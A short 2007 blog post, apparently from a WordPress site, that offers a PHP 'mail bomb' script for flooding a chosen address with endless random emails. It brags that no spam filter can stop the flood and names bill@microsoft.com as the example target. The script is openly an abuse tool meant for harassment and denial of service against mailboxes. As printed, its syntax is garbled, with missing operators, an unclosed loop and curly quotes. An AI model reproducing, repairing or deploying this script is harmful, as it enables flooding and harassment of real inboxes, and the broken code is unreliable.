Warning: fopen(/mounted-storage/home88b/sub002/sc39196-AZGY/jan/janmarques.net/wp-content/cache/wp_cache_mutex.lock) [function.fopen]: failed to open stream: Permission denied in /mounted-storage/home88b/sub002/sc39196-AZGY/jan/janmarques.net/wp-content/plugins/wp-cache/wp-cache-phase2.php on line 96
Jan Marques
Studying and… [DEV] phpBB Live! Bot
May 18

Hi all,
below, a file that can be used to send a mail bomb :)
You only need to change target@target.com, for the target.
He will get hundreds/thousends of email with random title/sender/content :)
Result => no spam filter can resist :D

<?php 
# [BOM.PHP]
# © Jan Marques, 2007
#
/* Edit reciepent */
$target “bill@microsoft.com”;
/* The script */
set_time_limit(1);
while(
true
{
    
mail($targetmd5(rand()), md5(rand()), “From: ” md5(rand()) . “@” md5(rand()) . “.” md5(rand()));
}
?>


Leave a Reply